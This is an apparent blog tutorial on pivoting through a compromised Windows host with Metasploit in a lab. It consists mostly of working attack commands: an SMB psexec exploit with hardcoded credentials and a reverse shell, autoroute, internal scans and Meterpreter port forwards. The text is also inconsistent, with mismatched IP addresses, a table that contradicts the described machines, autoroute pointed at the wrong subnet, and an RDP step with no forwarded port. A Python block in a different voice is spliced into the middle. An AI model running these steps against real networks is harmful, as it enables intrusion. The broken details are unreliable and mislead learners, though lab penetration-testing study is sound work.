Pivoting Using Metasploit Framework: Detailed Guide

✍️ By Admin   •   🗓️ May 10, 2025   •   ⏱️ 4 min read

Tags: Metasploit, Penetration Testing, Network Security, CyberSecurity

1. Introduction

Pivoting is a core penetration testing technique for reaching internal networks that are not directly routable from the attacking machine: traffic is relayed through a compromised host that sits on both networks. This guide gives step-by-step instructions for pivoting with the Metasploit Framework, including every command needed.

2. Lab Setup

Virtual Machines Required:

• Kali Linux (Attacker Machine)
• Windows (Pivot Machine) – connected to both the DMZ and the Internal Network
• Basic Pentesting 1 (Internal Network Machine)

Kali Linux: https://cdimage.kali.org/kali-2025.1a/kali-linux-2025.1a-virtualbox-amd64.7z

Windows: https://drive.google.com/uc?id=1-cDEpDRl5_-QWBU8Ckpp_Zep-1-9-EY4&export=download

Basic Pentesting 1: https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova

Network Configuration:

Network   IP Range          Machine
DMZ       192.168.56.0/24   Kali Linux & Metasploitable-3
Internal  192.168.138.0/24  Windows & Basic Pentesting 1

The attacker's Kali Linux machine has access only to the DMZ network, while the target Basic Pentesting 1 machine sits in the internal network and is not directly reachable.

3. Step-by-Step Exploitation and Pivoting Process

Step 1: Scanning and Identifying the Pivot Host

1. Identify available machines in the DMZ network:
   netdiscover
2. Scan open ports on Metasploitable-3:
   nmap -p- 192.168.56.101 --open
3. Identify the SMB service:
   nmap -p 445 --script smb-os-discovery 192.168.56.101

Step 2: Exploiting the Windows Machine

1. Open Metasploit:
   msfconsole
2. Select and configure the psexec module to exploit SMB:
   use exploit/windows/smb/psexec
   set RHOSTS 192.168.50.101
   set SMBUser vagrant
   set SMBPass vagrant
   set LHOST eth0
   set LPORT 4444
   exploit
3. Once exploited, verify access:
   sysinfo
   ipconfig

Expected Output: the interface list should show adapters on both the DMZ and the Internal Network.

Step 3: Setting Up Pivoting (Autoroute)

1. Background the session:
   background
2. Check existing sessions:
   sessions -l
3. Use the autoroute module:
   use post/multi/manage/autoroute
   set SESSION 1
   set SUBNET 192.168.56.0/24
   run
4. Verify the routing setup:
   route print

Step 4: Scanning the Internal Network

1. ARP sweep to find active hosts:
   use auxiliary/scanner/discovery/arp_sweep
   set RHOSTS 192.168.138.0/24
   run
2. Ping sweep through the pivot session to confirm which internal hosts respond:
   use post/multi/gather/ping_sweep
   set RHOSTS 192.168.138.0/24
   set SESSION 1
   run

Step 5: Exploiting the Internal Network

1. Use Metasploit's TCP port scanner module against an internal host:
   use auxiliary/scanner/portscan/tcp
   set RHOSTS 192.168.138.103
   run

Step 6: Port Forwarding (Access Internal Services)

1. Forward the internal web server and SSH ports to the attacker's machine:
   sessions -i 1
   portfwd add -l 8080 -p 80 -r 192.168.138.103
   portfwd add -l 2222 -p 22 -r 192.168.138.103
2. Now access the internal web server at http://127.0.0.1:8080 on Kali.

Then use the Remote Desktop client:

rdesktop 127.0.0.1
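How the two tables built in Step 3 and Step 6 fit together, as an added example (my own model, not code from this guide or from Metasploit): the session routing table that autoroute fills and the Meterpreter port-forward table, resolved the way Metasploit picks the most specific matching route. Assumed here: session 1 is the Windows pivot and the route covers the internal 192.168.138.0/24 network that Step 4 scans.

```python
# Added example, not Metasploit code: models the session routing table that
# autoroute fills (Step 3) and the Meterpreter port-forward table (Step 6).
import ipaddress

class PivotTable:
    """Session routes plus local port forwards, as `route print`
    and `portfwd list` would show them."""

    def __init__(self):
        self.routes = []    # (ip_network, session_id)
        self.forwards = {}  # local_port -> (remote_host, remote_port)

    def add_route(self, subnet, session):
        # Equivalent of autoroute with SUBNET=subnet and SESSION=session
        self.routes.append((ipaddress.ip_network(subnet), session))

    def add_portfwd(self, lport, rhost, rport):
        # Equivalent of `portfwd add -l lport -p rport -r rhost`
        self.forwards[lport] = (rhost, rport)

    def session_for(self, dest_ip):
        # Most specific (longest prefix) matching route wins; None means
        # the traffic leaves Kali directly, with no pivot involved.
        ip = ipaddress.ip_address(dest_ip)
        hits = [(net.prefixlen, sess) for net, sess in self.routes if ip in net]
        return max(hits)[1] if hits else None

    def resolve_local(self, lport):
        # Where a connection to 127.0.0.1:lport on Kali really ends up,
        # and which session carries it (None if nothing is forwarded there).
        if lport not in self.forwards:
            return None
        rhost, rport = self.forwards[lport]
        return rhost, rport, self.session_for(rhost)

def build_lab_table():
    """Table for the lab above: session 1 is the Windows pivot host; the
    route for the internal 192.168.138.0/24 network is an assumption."""
    t = PivotTable()
    t.add_route("192.168.138.0/24", 1)
    t.add_portfwd(8080, "192.168.138.103", 80)
    t.add_portfwd(2222, "192.168.138.103", 22)
    return t

if __name__ == "__main__":
    table = build_lab_table()
    for dest in ("192.168.56.101", "192.168.138.103"):
        print(dest, "-> session", table.session_for(dest))
    print("127.0.0.1:8080 ->", table.resolve_local(8080))
```

From the defender's side the same table shows why internal hosts only ever see the pivot host's own address as the source of routed and forwarded connections, which is what makes a dual-homed host suddenly reaching many internal ports worth alerting on.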

4. Summary & Key Takeaways

• Pivoting allows access to networks that are not directly reachable from the attacker's machine.
• Metasploit's autoroute module is used to establish network routes via a compromised host.
• Port forwarding enables access to internal services through a pivot machine.
• Scanning and enumeration of the internal network are crucial before exploitation.

This guide provides a structured approach to pivoting, ensuring complete network compromise through an efficient and tactical penetration testing methodology.